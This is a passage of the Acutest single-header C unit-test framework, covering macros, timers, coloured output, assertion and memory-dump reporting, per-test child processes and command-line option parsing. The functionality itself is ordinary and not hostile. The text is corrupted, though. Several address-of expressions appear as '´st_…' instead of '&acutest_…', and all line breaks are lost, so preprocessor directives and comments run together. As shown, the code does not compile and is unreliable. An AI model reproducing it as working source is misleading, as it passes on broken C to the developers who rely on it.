TEST_MSG_MAXSIZE 1024 #endif /* Macro for dumping a block of memory. * * Its intended use is very similar to what TEST_MSG is for, but instead of * generating any printf-like message, this is for dumping raw block of a * memory in a hexadecimal form: * * TEST_CHECK(size_produced == size_expected && * memcmp(addr_produced, addr_expected, size_produced) == 0); * TEST_DUMP("Expected:", addr_expected, size_expected); * TEST_DUMP("Produced:", addr_produced, size_produced); */ #define TEST_DUMP(title, addr, size) acutest_dump_(title, addr, size) /* Maximal output per TEST_DUMP call (in bytes to dump). Longer blocks are cut. * You may define another limit prior including "acutest.h" */ #ifndef TEST_DUMP_MAXSIZE #define TEST_DUMP_MAXSIZE 1024 #endif /* Common test initialiation/clean-up * * In some test suites, it may be needed to perform some sort of the same * initialization and/or clean-up in all the tests. * * Such test suites may use macros TEST_INIT and/or TEST_FINI prior including * this header. The expansion of the macro is then used as a body of helper * function called just before executing every single (TEST_INIT) or just after * it ends (TEST_FINI). * * Examples of various ways how to use the macro TEST_INIT: * * #define TEST_INIT my_init_func(); * #define TEST_INIT my_init_func() // Works even without the * semicolon #define TEST_INIT setlocale(LC_ALL, NULL); #define TEST_INIT * { setlocale(LC_ALL, NULL); my_init_func(); } * * TEST_FINI is to be used in the same way. */ /********************** *** Implementation *** **********************/ /* The unit test files should not rely on anything below. */ #include <ctype.h> #include <stdarg.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <setjmp.h> #if defined(unix) || defined(__unix__) || defined(__unix) || \ defined(__APPLE__) || defined(__HAIKU__) #define ACUTEST_UNIX_ 1 #include <errno.h> #include <libgen.h> #include <unistd.h> #include <sys/types.h> #include <sys/wait.h> #include <signal.h> #include <time.h> #if defined CLOCK_PROCESS_CPUTIME_ID && defined CLOCK_MONOTONIC #define ACUTEST_HAS_POSIX_TIMER_ 1 #endif #endif #if defined(_gnu_linux_) || defined(__linux__) #define ACUTEST_LINUX_ 1 #include <fcntl.h> #include <sys/stat.h> #endif #if defined(_WIN32) || defined(__WIN32__) || defined(__WINDOWS__) #define ACUTEST_WIN_ 1 #include <windows.h> #include <io.h> #endif #if defined(__APPLE__) #define ACUTEST_MACOS_ #include <assert.h> #include <stdbool.h> #include <sys/types.h> #include <unistd.h> #include <sys/sysctl.h> #endif #ifdef __cplusplus #include <exception> #endif #ifdef __has_include #if __has_include(<valgrind.h>) #include <valgrind.h> #endif #endif /* Enable the use of the non-standard keyword __attribute__ to silence warnings * under some compilers */ #if defined(__GNUC__) || defined(__clang__) #define ACUTEST_ATTRIBUTE_(attr) __attribute__((attr)) #else #define ACUTEST_ATTRIBUTE_(attr) #endif /* Note our global private identifiers end with '_' to mitigate risk of clash * with the unit tests implementation. */ #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER /* In the multi-platform code like ours, we cannot use the non-standard * "safe" functions from Microsoft C lib like e.g. sprintf_s() instead of * standard sprintf(). Hence, lets disable the warning C4996. */ #pragma warning(push) #pragma warning(disable : 4996) #endif struct acutest_test_ { const char *name; void (*func)(void); }; struct acutest_test_data_ { unsigned char flags; double duration; }; enum { ACUTEST_FLAG_RUN_ = 1 << 0, ACUTEST_FLAG_SUCCESS_ = 1 << 1, ACUTEST_FLAG_FAILURE_ = 1 << 2, }; extern const struct acutest_test_ acutest_list_[]; int acutest_check_(int cond, const char *file, int line, const char *fmt, ...); void acutest_case_(const char *fmt, ...); void acutest_message_(const char *fmt, ...); void acutest_dump_(const char *title, const void *addr, size_t size); void acutest_abort_(void) ACUTEST_ATTRIBUTE_(noreturn); #ifndef TEST_NO_MAIN static char *acutest_argv0_ = NULL; static size_t acutest_list_size_ = 0; static struct acutest_test_data_ *acutest_test_data_ = NULL; static size_t acutest_count_ = 0; static int acutest_no_exec_ = -1; static int acutest_no_summary_ = 0; static int acutest_tap_ = 0; static int acutest_skip_mode_ = 0; static int acutest_worker_ = 0; static int acutest_worker_index_ = 0; static int acutest_cond_failed_ = 0; static int acutest_was_aborted_ = 0; static FILE *acutest_xml_output_ = NULL; static int acutest_stat_failed_units_ = 0; static int acutest_stat_run_units_ = 0; static const struct acutest_test_ *acutest_current_test_ = NULL; static int acutest_current_index_ = 0; static char acutest_case_name_[TEST_CASE_MAXSIZE] = ""; static int acutest_test_already_logged_ = 0; static int acutest_case_already_logged_ = 0; static int acutest_verbose_level_ = 2; static int acutest_test_failures_ = 0; static int acutest_colorize_ = 0; static int acutest_timer_ = 0; static int acutest_abort_has_jmp_buf_ = 0; static jmp_buf acutest_abort_jmp_buf_; static void acutest_cleanup_(void) { free((void *)acutest_test_data_); } static void ACUTEST_ATTRIBUTE_(noreturn) acutest_exit_(int exit_code) { acutest_cleanup_(); exit(exit_code); } #if defined ACUTEST_WIN_ typedef LARGE_INTEGER acutest_timer_type_; static LARGE_INTEGER acutest_timer_freq_; static acutest_timer_type_ acutest_timer_start_; static acutest_timer_type_ acutest_timer_end_; static void acutest_timer_init_(void) { QueryPerformanceFrequency(´st_timer_freq_); } static void acutest_timer_get_time_(LARGE_INTEGER *ts) { QueryPerformanceCounter(ts); } static double acutest_timer_diff_(LARGE_INTEGER start, LARGE_INTEGER end) { double duration = (double)(end.QuadPart - start.QuadPart); duration /= (double)acutest_timer_freq_.QuadPart; return duration; } static void acutest_timer_print_diff_(void) { printf("%.6lf secs", acutest_timer_diff_(acutest_timer_start_, acutest_timer_end_)); } #elif defined ACUTEST_HAS_POSIX_TIMER_ static clockid_t acutest_timer_id_; typedef struct timespec acutest_timer_type_; static acutest_timer_type_ acutest_timer_start_; static acutest_timer_type_ acutest_timer_end_; static void acutest_timer_init_(void) { if (acutest_timer_ == 1) acutest_timer_id_ = CLOCK_MONOTONIC; else if (acutest_timer_ == 2) acutest_timer_id_ = CLOCK_PROCESS_CPUTIME_ID; } static void acutest_timer_get_time_(struct timespec *ts) { clock_gettime(acutest_timer_id_, ts); } static double acutest_timer_diff_(struct timespec start, struct timespec end) { double endns; double startns; endns = end.tv_sec; endns *= 1e9; endns += end.tv_nsec; startns = start.tv_sec; startns *= 1e9; startns += start.tv_nsec; return ((endns - startns) / 1e9); } static void acutest_timer_print_diff_(void) { printf("%.6lf secs", acutest_timer_diff_(acutest_timer_start_, acutest_timer_end_)); } #else typedef int acutest_timer_type_; static acutest_timer_type_ acutest_timer_start_; static acutest_timer_type_ acutest_timer_end_; void acutest_timer_init_(void) {} static void acutest_timer_get_time_(int *ts) { (void)ts; } static double acutest_timer_diff_(int start, int end) { (void)start; (void)end; return 0.0; } static void acutest_timer_print_diff_(void) {} #endif #define ACUTEST_COLOR_DEFAULT_ 0 #define ACUTEST_COLOR_GREEN_ 1 #define ACUTEST_COLOR_RED_ 2 #define ACUTEST_COLOR_DEFAULT_INTENSIVE_ 3 #define ACUTEST_COLOR_GREEN_INTENSIVE_ 4 #define ACUTEST_COLOR_RED_INTENSIVE_ 5 static int ACUTEST_ATTRIBUTE_(format(printf, 2, 3)) acutest_colored_printf_(int color, const char *fmt, ...) { va_list args; char buffer[256]; int n; va_start(args, fmt); vsnprintf(buffer, sizeof(buffer), fmt, args); va_end(args); buffer[sizeof(buffer) - 1] = '\0'; if (!acutest_colorize_) { return printf("%s", buffer); } #if defined ACUTEST_UNIX_ { const char *col_str; switch (color) { case ACUTEST_COLOR_GREEN_: col_str = "\033[0;32m"; break; case ACUTEST_COLOR_RED_: col_str = "\033[0;31m"; break; case ACUTEST_COLOR_GREEN_INTENSIVE_: col_str = "\033[1;32m"; break; case ACUTEST_COLOR_RED_INTENSIVE_: col_str = "\033[1;31m"; break; case ACUTEST_COLOR_DEFAULT_INTENSIVE_: col_str = "\033[1m"; break; default: col_str = "\033[0m"; break; } printf("%s", col_str); n = printf("%s", buffer); printf("\033[0m"); return n; } #elif defined ACUTEST_WIN_ { HANDLE h; CONSOLE_SCREEN_BUFFER_INFO info; WORD attr; h = GetStdHandle(STD_OUTPUT_HANDLE); GetConsoleScreenBufferInfo(h, &info); switch (color) { case ACUTEST_COLOR_GREEN_: attr = FOREGROUND_GREEN; break; case ACUTEST_COLOR_RED_: attr = FOREGROUND_RED; break; case ACUTEST_COLOR_GREEN_INTENSIVE_: attr = FOREGROUND_GREEN | FOREGROUND_INTENSITY; break; case ACUTEST_COLOR_RED_INTENSIVE_: attr = FOREGROUND_RED | FOREGROUND_INTENSITY; break; case ACUTEST_COLOR_DEFAULT_INTENSIVE_: attr = FOREGROUND_BLUE | FOREGROUND_GREEN | FOREGROUND_RED | FOREGROUND_INTENSITY; break; default: attr = 0; break; } if (attr != 0) SetConsoleTextAttribute(h, attr); n = printf("%s", buffer); SetConsoleTextAttribute(h, info.wAttributes); return n; } #else n = printf("%s", buffer); return n; #endif } static void acutest_begin_test_line_(const struct acutest_test_ *test) { if (!acutest_tap_) { if (acutest_verbose_level_ >= 3) { acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Test %s:\n", test->name); acutest_test_already_logged_++; } else if (acutest_verbose_level_ >= 1) { int n; char spaces[48]; n = acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Test %s... ", test->name); memset(spaces, ' ', sizeof(spaces)); if (n < (int)sizeof(spaces)) printf("%.*s", (int)sizeof(spaces) - n, spaces); } else { acutest_test_already_logged_ = 1; } } } static void acutest_finish_test_line_(int result) { if (acutest_tap_) { const char *str = (result == 0) ? "ok" : "not ok"; printf("%s %d - %s\n", str, acutest_current_index_ + 1, acutest_current_test_->name); if (result == 0 && acutest_timer_) { printf("# Duration: "); acutest_timer_print_diff_(); printf("\n"); } } else { int color = (result == 0) ? ACUTEST_COLOR_GREEN_INTENSIVE_ : ACUTEST_COLOR_RED_INTENSIVE_; const char *str = (result == 0) ? "OK" : "FAILED"; printf("[ "); acutest_colored_printf_(color, "%s", str); printf(" ]"); if (result == 0 && acutest_timer_) { printf(" "); acutest_timer_print_diff_(); } printf("\n"); } } static void acutest_line_indent_(int level) { static const char spaces[] = " "; int n = level * 2; if (acutest_tap_ && n > 0) { n--; printf("#"); } while (n > 16) { printf("%s", spaces); n -= 16; } printf("%.*s", n, spaces); } int ACUTEST_ATTRIBUTE_(format(printf, 4, 5)) acutest_check_(int cond, const char *file, int line, const char *fmt, ...) { const char *result_str; int result_color; int verbose_level; if (cond) { result_str = "ok"; result_color = ACUTEST_COLOR_GREEN_; verbose_level = 3; } else { if (!acutest_test_already_logged_ && acutest_current_test_ != NULL) acutest_finish_test_line_(-1); result_str = "failed"; result_color = ACUTEST_COLOR_RED_; verbose_level = 2; acutest_test_failures_++; acutest_test_already_logged_++; } if (acutest_verbose_level_ >= verbose_level) { va_list args; if (!acutest_case_already_logged_ && acutest_case_name_[0]) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Case %s:\n", acutest_case_name_); acutest_test_already_logged_++; acutest_case_already_logged_++; } acutest_line_indent_(acutest_case_name_[0] ? 2 : 1); if (file != NULL) { #ifdef ACUTEST_WIN_ const char *lastsep1 = strrchr(file, '\\'); const char *lastsep2 = strrchr(file, '/'); if (lastsep1 == NULL) lastsep1 = file - 1; if (lastsep2 == NULL) lastsep2 = file - 1; file = (lastsep1 > lastsep2 ? lastsep1 : lastsep2) + 1; #else const char *lastsep = strrchr(file, '/'); if (lastsep != NULL) file = lastsep + 1; #endif printf("%s:%d: Check ", file, line); } va_start(args, fmt); vprintf(fmt, args); va_end(args); printf("... "); acutest_colored_printf_(result_color, "%s", result_str); printf("\n"); acutest_test_already_logged_++; } acutest_cond_failed_ = (cond == 0); return !acutest_cond_failed_; } void ACUTEST_ATTRIBUTE_(format(printf, 1, 2)) acutest_case_(const char *fmt, ...) { va_list args; if (acutest_verbose_level_ < 2) return; if (acutest_case_name_[0]) { acutest_case_already_logged_ = 0; acutest_case_name_[0] = '\0'; } if (fmt == NULL) return; va_start(args, fmt); vsnprintf(acutest_case_name_, sizeof(acutest_case_name_) - 1, fmt, args); va_end(args); acutest_case_name_[sizeof(acutest_case_name_) - 1] = '\0'; if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Case %s:\n", acutest_case_name_); acutest_test_already_logged_++; acutest_case_already_logged_++; } } void ACUTEST_ATTRIBUTE_(format(printf, 1, 2)) acutest_message_(const char *fmt, ...) { char buffer[TEST_MSG_MAXSIZE]; char *line_beg; char *line_end; va_list args; if (acutest_verbose_level_ < 2) return; /* We allow extra message only when something is already wrong in the * current test. */ if (acutest_current_test_ == NULL || !acutest_cond_failed_) return; va_start(args, fmt); vsnprintf(buffer, TEST_MSG_MAXSIZE, fmt, args); va_end(args); buffer[TEST_MSG_MAXSIZE - 1] = '\0'; line_beg = buffer; while (1) { line_end = strchr(line_beg, '\n'); if (line_end == NULL) break; acutest_line_indent_(acutest_case_name_[0] ? 3 : 2); printf("%.*s\n", (int)(line_end - line_beg), line_beg); line_beg = line_end + 1; } if (line_beg[0] != '\0') { acutest_line_indent_(acutest_case_name_[0] ? 3 : 2); printf("%s\n", line_beg); } } void acutest_dump_(const char *title, const void *addr, size_t size) { static const size_t BYTES_PER_LINE = 16; size_t line_beg; size_t truncate = 0; if (acutest_verbose_level_ < 2) return; /* We allow extra message only when something is already wrong in the * current test. */ if (acutest_current_test_ == NULL || !acutest_cond_failed_) return; if (size > TEST_DUMP_MAXSIZE) { truncate = size - TEST_DUMP_MAXSIZE; size = TEST_DUMP_MAXSIZE; } acutest_line_indent_(acutest_case_name_[0] ? 3 : 2); printf((title[strlen(title) - 1] == ':') ? "%s\n" : "%s:\n", title); for (line_beg = 0; line_beg < size; line_beg += BYTES_PER_LINE) { size_t line_end = line_beg + BYTES_PER_LINE; size_t off; acutest_line_indent_(acutest_case_name_[0] ? 4 : 3); printf("%08lx: ", (unsigned long)line_beg); for (off = line_beg; off < line_end; off++) { if (off < size) printf(" %02x", ((const unsigned char *)addr)[off]); else printf(" "); } printf(" "); for (off = line_beg; off < line_end; off++) { unsigned char byte = ((const unsigned char *)addr)[off]; if (off < size) printf("%c", (iscntrl(byte) ? '.' : byte)); else break; } printf("\n"); } if (truncate > 0) { acutest_line_indent_(acutest_case_name_[0] ? 4 : 3); printf(" ... (and more %u bytes)\n", (unsigned)truncate); } } /* This is called just before each test */ static void acutest_init_(const char *test_name) { #ifdef TEST_INIT TEST_INIT; /* Allow for a single unterminated function call */ #endif /* Suppress any warnings about unused variable. */ (void)test_name; } /* This is called after each test */ static void acutest_fini_(const char *test_name) { #ifdef TEST_FINI TEST_FINI; /* Allow for a single unterminated function call */ #endif /* Suppress any warnings about unused variable. */ (void)test_name; } void acutest_abort_(void) { if (acutest_abort_has_jmp_buf_) { longjmp(acutest_abort_jmp_buf_, 1); } else { if (acutest_current_test_ != NULL) acutest_fini_(acutest_current_test_->name); abort(); } } static void acutest_list_names_(void) { const struct acutest_test_ *test; printf("Unit tests:\n"); for (test = ´st_list_[0]; test->func != NULL; test++) printf(" %s\n", test->name); } static void acutest_remember_(int i) { if (acutest_test_data_[i].flags & ACUTEST_FLAG_RUN_) return; acutest_test_data_[i].flags |= ACUTEST_FLAG_RUN_; acutest_count_++; } static void acutest_set_success_(int i, int success) { acutest_test_data_[i].flags |= success ? ACUTEST_FLAG_SUCCESS_ : ACUTEST_FLAG_FAILURE_; } static void acutest_set_duration_(int i, double duration) { acutest_test_data_[i].duration = duration; } static int acutest_name_contains_word_(const char *name, const char *pattern) { static const char word_delim[] = " \t-_/.,:;"; const char *substr; size_t pattern_len; pattern_len = strlen(pattern); substr = strstr(name, pattern); while (substr != NULL) { int starts_on_word_boundary = (substr == name || strchr(word_delim, substr[-1]) != NULL); int ends_on_word_boundary = (substr[pattern_len] == '\0' || strchr(word_delim, substr[pattern_len]) != NULL); if (starts_on_word_boundary && ends_on_word_boundary) return 1; substr = strstr(substr + 1, pattern); } return 0; } static int acutest_lookup_(const char *pattern) { int i; int n = 0; /* Try exact match. */ for (i = 0; i < (int)acutest_list_size_; i++) { if (strcmp(acutest_list_[i].name, pattern) == 0) { acutest_remember_(i); n++; break; } } if (n > 0) return n; /* Try word match. */ for (i = 0; i < (int)acutest_list_size_; i++) { if (acutest_name_contains_word_(acutest_list_[i].name, pattern)) { acutest_remember_(i); n++; } } if (n > 0) return n; /* Try relaxed match. */ for (i = 0; i < (int)acutest_list_size_; i++) { if (strstr(acutest_list_[i].name, pattern) != NULL) { acutest_remember_(i); n++; } } return n; } /* Called if anything goes bad in Acutest, or if the unit test ends in other * way then by normal returning from its function (e.g. exception or some * abnormal child process termination). */ static void ACUTEST_ATTRIBUTE_(format(printf, 1, 2)) acutest_error_(const char *fmt, ...) { if (acutest_verbose_level_ == 0) return; if (acutest_verbose_level_ >= 2) { va_list args; acutest_line_indent_(1); if (acutest_verbose_level_ >= 3) acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "ERROR: "); va_start(args, fmt); vprintf(fmt, args); va_end(args); printf("\n"); } if (acutest_verbose_level_ >= 3) { printf("\n"); } } /* Call directly the given test unit function. */ static int acutest_do_run_(const struct acutest_test_ *test, int index) { int status = -1; acutest_was_aborted_ = 0; acutest_current_test_ = test; acutest_current_index_ = index; acutest_test_failures_ = 0; acutest_test_already_logged_ = 0; acutest_cond_failed_ = 0; #ifdef __cplusplus try { #endif acutest_init_(test->name); acutest_begin_test_line_(test); /* This is good to do in case the test unit crashes. */ fflush(stdout); fflush(stderr); if (!acutest_worker_) { acutest_abort_has_jmp_buf_ = 1; if (setjmp(acutest_abort_jmp_buf_) != 0) { acutest_was_aborted_ = 1; goto aborted; } } acutest_timer_get_time_(´st_timer_start_); test->func(); aborted: acutest_abort_has_jmp_buf_ = 0; acutest_timer_get_time_(´st_timer_end_); if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); if (acutest_test_failures_ == 0) { acutest_colored_printf_(ACUTEST_COLOR_GREEN_INTENSIVE_, "SUCCESS: "); printf("All conditions have passed.\n"); if (acutest_timer_) { acutest_line_indent_(1); printf("Duration: "); acutest_timer_print_diff_(); printf("\n"); } } else { acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED: "); if (!acutest_was_aborted_) { printf("%d condition%s %s failed.\n", acutest_test_failures_, (acutest_test_failures_ == 1) ? "" : "s", (acutest_test_failures_ == 1) ? "has" : "have"); } else { printf("Aborted.\n"); } } printf("\n"); } else if (acutest_verbose_level_ >= 1 && acutest_test_failures_ == 0) { acutest_finish_test_line_(0); } status = (acutest_test_failures_ == 0) ? 0 : -1; #ifdef __cplusplus } catch (std::exception &e) { const char *what = e.what(); acutest_check_(0, NULL, 0, "Threw std::exception"); if (what != NULL) acutest_message_("std::exception::what(): %s", what); if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED: "); printf("C++ exception.\n\n"); } } catch (...) { acutest_check_(0, NULL, 0, "Threw an exception"); if (acutest_verbose_level_ >= 3) { acutest_line_indent_(1); acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED: "); printf("C++ exception.\n\n"); } } #endif acutest_fini_(test->name); acutest_case_(NULL); acutest_current_test_ = NULL; return status; } /* Trigger the unit test. If possible (and not suppressed) it starts a child * process who calls acutest_do_run_(), otherwise it calls acutest_do_run_() * directly. */ static void acutest_run_(const struct acutest_test_ *test, int index, int master_index) { int failed = 1; acutest_timer_type_ start, end; acutest_current_test_ = test; acutest_test_already_logged_ = 0; acutest_timer_get_time_(&start); if (!acutest_no_exec_) { #if defined(ACUTEST_UNIX_) pid_t pid; int exit_code; /* Make sure the child starts with empty I/O buffers. */ fflush(stdout); fflush(stderr); pid = fork(); if (pid == (pid_t)-1) { acutest_error_("Cannot fork. %s [%d]", strerror(errno), errno); failed = 1; } else if (pid == 0) { /* Child: Do the test. */ acutest_worker_ = 1; failed = (acutest_do_run_(test, index) != 0); acutest_exit_(failed ? 1 : 0); } else { /* Parent: Wait until child terminates and analyze its exit code. */ waitpid(pid, &exit_code, 0); if (WIFEXITED(exit_code)) { switch (WEXITSTATUS(exit_code)) { case 0: failed = 0; break; /* test has passed. */ case 1: /* noop */ break; /* "normal" failure. */ default: acutest_error_("Unexpected exit code [%d]", WEXITSTATUS(exit_code)); } } else if (WIFSIGNALED(exit_code)) { char tmp[32]; const char *signame; switch (WTERMSIG(exit_code)) { case SIGINT: signame = "SIGINT"; break; case SIGHUP: signame = "SIGHUP"; break; case SIGQUIT: signame = "SIGQUIT"; break; case SIGABRT: signame = "SIGABRT"; break; case SIGKILL: signame = "SIGKILL"; break; case SIGSEGV: signame = "SIGSEGV"; break; case SIGILL: signame = "SIGILL"; break; case SIGTERM: signame = "SIGTERM"; break; default: sprintf(tmp, "signal %d", WTERMSIG(exit_code)); signame = tmp; break; } acutest_error_("Test interrupted by %s.", signame); } else { acutest_error_("Test ended in an unexpected way [%d].", exit_code); } } #elif defined(ACUTEST_WIN_) char buffer[512] = {0}; STARTUPINFOA startupInfo; PROCESS_INFORMATION processInfo; DWORD exitCode; /* Windows has no fork(). So we propagate all info into the child * through a command line arguments. */ _snprintf(buffer, sizeof(buffer) - 1, "%s --worker=%d %s --no-exec --no-summary %s --verbose=%d " "--color=%s -- \"%s\"", acutest_argv0_, index, acutest_timer_ ? "--time" : "", acutest_tap_ ? "--tap" : "", acutest_verbose_level_, acutest_colorize_ ? "always" : "never", test->name); memset(&startupInfo, 0, sizeof(startupInfo)); startupInfo.cb = sizeof(STARTUPINFO); if (CreateProcessA(NULL, buffer, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo)) { WaitForSingleObject(processInfo.hProcess, INFINITE); GetExitCodeProcess(processInfo.hProcess, &exitCode); CloseHandle(processInfo.hThread); CloseHandle(processInfo.hProcess); failed = (exitCode != 0); if (exitCode > 1) { switch (exitCode) { case 3: acutest_error_("Aborted."); break; case 0xC0000005: acutest_error_("Access violation."); break; default: acutest_error_("Test ended in an unexpected way [%lu].", exitCode); break; } } } else { acutest_error_("Cannot create unit test subprocess [%ld].", GetLastError()); failed = 1; } #else /* A platform where we don't know how to run child process. */ failed = (acutest_do_run_(test, index) != 0); #endif } else { /* Child processes suppressed through --no-exec. */ failed = (acutest_do_run_(test, index) != 0); } acutest_timer_get_time_(&end); acutest_current_test_ = NULL; acutest_stat_run_units_++; if (failed) acutest_stat_failed_units_++; acutest_set_success_(master_index, !failed); acutest_set_duration_(master_index, acutest_timer_diff_(start, end)); } #if defined(ACUTEST_WIN_) /* Callback for SEH events. */ static LONG CALLBACK acutest_seh_exception_filter_(EXCEPTION_POINTERS *ptrs) { acutest_check_(0, NULL, 0, "Unhandled SEH exception"); acutest_message_("Exception code: 0x%08lx", ptrs->ExceptionRecord->ExceptionCode); acutest_message_("Exception address: 0x%p", ptrs->ExceptionRecord->ExceptionAddress); fflush(stdout); fflush(stderr); return EXCEPTION_EXECUTE_HANDLER; } #endif #define ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_ 0x0001 #define ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_ 0x0002 #define ACUTEST_CMDLINE_OPTID_NONE_ 0 #define ACUTEST_CMDLINE_OPTID_UNKNOWN_ (-0x7fffffff + 0) #define ACUTEST_CMDLINE_OPTID_MISSINGARG_ (-0x7fffffff + 1) #define ACUTEST_CMDLINE_OPTID_BOGUSARG_ (-0x7fffffff + 2) typedef struct acutest_test_CMDLINE_OPTION_ { char shortname; const char *longname; int id; unsigned flags; } ACUTEST_CMDLINE_OPTION_; static int acutest_cmdline_handle_short_opt_group_( const ACUTEST_CMDLINE_OPTION_ *options, const char *arggroup, int (*callback)(int /*optval*/, const char * /*arg*/)) { const ACUTEST_CMDLINE_OPTION_ *opt; int i; int ret = 0; for (i = 0; arggroup[i] != '\0'; i++) { for (opt = options; opt->id != 0; opt++) { if (arggroup[i] == opt->shortname) break; } if (opt->id != 0 && !(opt->flags & ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_)) { ret = callback(opt->id, NULL); } else { /* Unknown option. */ char badoptname[3]; badoptname[0] = '-'; badoptname[1] = arggroup[i]; badoptname[2] = '\0'; ret = callback((opt->id != 0 ? ACUTEST_CMDLINE_OPTID_MISSINGARG_ : ACUTEST_CMDLINE_OPTID_UNKNOWN_), badoptname); } if (ret != 0) break; } return ret; } #define ACUTEST_CMDLINE_AUXBUF_SIZE_ 32 static int acutest_cmdline_read_(const ACUTEST_CMDLINE_OPTION_ *options, int argc, char **argv, int (*callback)(int /*optval*/, const char * /*arg*/)) { const ACUTEST_CMDLINE_OPTION_ *opt; char auxbuf[ACUTEST_CMDLINE_AUXBUF_SIZE_ + 1]; int after_doubledash = 0; int i = 1; int ret = 0; auxbuf[ACUTEST_CMDLINE_AUXBUF_SIZE_] = '\0'; while (i < argc) { if (after_doubledash || strcmp(argv[i], "-") == 0) { /* Non-option argument. */ ret = callback(ACUTEST_CMDLINE_OPTID_NONE_, argv[i]); } else if (strcmp(argv[i], "--") == 0) { /* End of options. All the remaining members are non-option * arguments. */ after_doubledash = 1; } else if (argv[i][0] != '-') { /* Non-option argument. */ ret = callback(ACUTEST_CMDLINE_OPTID_NONE_, argv[i]); } else { for (opt = options; opt->id != 0; opt++) { if (opt->longname != NULL && strncmp(argv[i], "--", 2) == 0) { size_t len = strlen(opt->longname); if (strncmp(argv[i] + 2, opt->longname, len) == 0) { /* Regular long option. */ if (argv[i][2 + len] == '\0') { /* with no argument provided. */ if (!(opt->flags & ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_)) ret = callback(opt->id, NULL); else ret = callback( ACUTEST_CMDLINE_OPTID_MISSINGARG_, argv[i]); break; } else if (argv[i][2 + len] == '=') { /* with an argument provided. */ if (opt->flags & (ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_ | ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_)) { ret = callback(opt->id, argv[i] + 2 + len + 1); } else { sprintf(auxbuf, "--%s", opt->longname); ret = callback(ACUTEST_CMDLINE_OPTID_BOGUSARG_, auxbuf); } break; } else { continue; } } } else if (opt->shortname != '\0' && argv[i][0] == '-') { if (argv[i][1] == opt->shortname) { /* Regular short option. */ if (opt->flags & ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_) { if (argv[i][2] != '\0') ret = callback(opt->id, argv[i] + 2); else if (i + 1 < argc) ret = callback(opt->id, argv[++i]); else ret = callback( ACUTEST_CMDLINE_OPTID_MISSINGARG_, argv[i]); break; } else { ret = callback(opt->id, NULL); /* There might be more (argument-less) short options * grouped together. */ if (ret == 0 && argv[i][2] != '\0') ret = acutest_cmdline_handle_short_opt_group_( options, argv[i] + 2, callback); break; } } } } if (opt->id == 0) { /* still not handled? */ if (argv[i][0] != '-') { /* Non-option argument. */ ret = callback(ACUTEST_CMDLINE_OPTID_NONE_, argv[i]); } else { /* Unknown option. */ char *badoptname = argv[i]; if (strncmp(badoptname, "--", 2) == 0) { /* Strip any argument from the long option. */ char *assignment = strchr(badoptname, '='); if (assignment != NULL) { size_t len = assignment - badoptname; if (len > ACUTEST_CMDLINE_AUXBUF_SIZE_) len = ACUTEST_CMDLINE_AUXBUF_SIZE_; strncpy(auxbuf, badoptname, len); auxbuf[len] = '\0'; badoptname = auxbuf; } } ret = callback(ACUTEST_CMDLINE_OPTID_UNKNOWN_, badoptname); } } } if (ret != 0) return ret; i++; } return ret; } static void acutest_help_(void) { printf("Usage: %s [options] [test...]\n", acutest_argv0_); printf("\n"); printf("Run the specified unit tests; or if the option '--skip' is used, " "run all\n"); printf("tests in the suite but those listed. By default, if no tests are " "specified\n"); printf("on the command line, all unit tests in the suite are run.\n"); printf("\n"); printf("Options:\n"); printf( " -s, --skip Execute all unit tests but the listed ones\n"); printf(" --exec[=WHEN] If supported, execute unit tests as child " "processes\n"); printf(" (WHEN is one of 'auto', 'always', " "'never')\n"); printf(" -E, --no-exec Same as --exec=never\n"); #if defined ACUTEST_WIN_ printf(" -t, --time Measure test duration\n"); #elif defined ACUTEST_HAS_POSIX_TIMER_ printf(" -t, --time Measure test duration (real time)\n"); printf( " --time=TIMER Measure test duration, using given timer\n"); printf(" (TIMER is one of 'real', 'cpu')\n"); #endif printf( " --no-summary Suppress printing of test results summary\n"); printf(" --tap Produce TAP-compliant output\n"); printf(" (See https://testanything.org/)\n"); printf(" -x, --xml-output=FILE Enable XUnit output to the given file\n"); printf(" -l, --list List unit tests in the suite and exit\n"); printf(" -v, --verbose Make output more verbose\n"); printf(" --verbose=LEVEL Set verbose level to LEVEL:\n"); printf(" 0 ... Be silent\n"); printf(" 1 ... Output one line per test (and " "summary)\n"); printf(" 2 ... As 1 and failed conditions (this " "is default)\n"); printf(" 3 ... As 1 and all conditions (and " "extended summary)\n"); printf(" -q, --quiet Same as --verbose=0\n"); printf(" --color[=WHEN] Enable colorized output\n"); printf(" (WHEN is one of 'auto', 'always', " "'never')\n"); printf(" --no-color Same as --color=never\n"); printf(" -h, --help Display this help and exit\n"); if (acutest_list_size_ < 16) { printf("\n"); acutest_list_names_(); } } static const ACUTEST_CMDLINE_OPTION_ acutest_cmdline_options_[] = { {'s', "skip", 's', 0}, {0, "exec", 'e', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {'E', "no-exec", 'E', 0}, #if defined ACUTEST_WIN_ {'t', "time", 't', 0}, {0, "timer", 't', 0}, /* kept for compatibility */ #elif defined ACUTEST_HAS_POSIX_TIMER_ {'t', "time", 't', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {0, "timer", 't', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, /* kept for compatibility */ #endif {0, "no-summary", 'S', 0}, {0, "tap", 'T', 0}, {'l', "list", 'l', 0}, 